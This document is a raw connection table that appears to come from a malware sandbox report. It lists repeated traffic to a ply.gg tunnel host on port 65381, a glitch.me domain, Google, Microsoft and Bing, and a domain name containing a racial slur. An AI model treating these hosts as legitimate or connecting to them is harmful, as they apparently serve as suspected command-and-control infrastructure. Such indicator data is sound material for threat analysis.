| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 13.107.6.158:80 | edge-http.microsoft.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 95.100.153.185:443 | www.bing.com | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 13.107.6.158:80 | edge-http.microsoft.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 95.100.153.138:443 | www.bing.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
